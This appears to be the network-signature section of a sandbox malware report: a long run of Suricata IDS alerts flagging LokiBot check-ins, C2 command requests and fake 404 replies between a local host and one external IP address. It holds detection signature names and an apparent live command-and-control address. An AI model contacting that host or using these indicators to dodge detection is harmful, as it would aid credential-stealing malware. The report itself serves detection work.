            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49787 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49742 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49742 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49821 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49821 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49786 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49786 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49786 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49829 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49829 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49829
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49819 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49800 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49779 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49839 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49831 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49786 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49774 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49786 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49827
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49821 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49824 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49821 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49824 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49781 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49781 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49811 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49781 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49811 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49787 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49744
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49828 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49828 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49812 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49793 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49781 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49780 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49781 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49834 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49811
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49783
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49834 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49780
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49836 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49735 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49759 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49762 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49792 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49831 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49742
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49824
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49736
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49828 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49758 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49834 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49834 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49828 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49800 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49828 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49800 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49792 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49792 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49792
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49814 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49814 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49814 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49814 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49814 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49814
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49766 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49819 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49819 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49839 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49782 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49782 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49781
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49839 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49747 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49747 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49836 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49766 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49774 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49795 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49766 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49795 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49795 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49766
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49770 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49770 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49770 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49812 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49758 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49758 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49822 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49755
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49787
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49786
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49831 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49735
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49819
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49747 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49817 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49817 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49817 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49770 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49747 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49770 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49762 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49761 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49836 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49844 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49844 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49762
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49844 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49774 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49821
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49812
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49761 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49822 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49761 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49774
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49795 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49822 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49795 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49834
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49831 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49782 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49804 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49747 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49817 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49839 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49793 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49793 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49782 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49779 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49758 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49758 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49828
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49822 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49761
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49836 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49741 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49836 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49822 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49839 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49784 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49784 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49784 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49782 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49733
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49793 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49757
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49782
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49795
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49758
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49804 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49804 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49831
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49789 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49815 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49789 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49789 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49844 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49836
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49779
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49778 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49778 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49839
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49822
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49759 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49817 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49817
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49794 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49794 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49794 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49759 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49759 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49804 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49784 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49844 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49784 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49793 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49813 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49794 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49813 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49789 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49813 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49789 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49815 -> 45.66.231.242:80
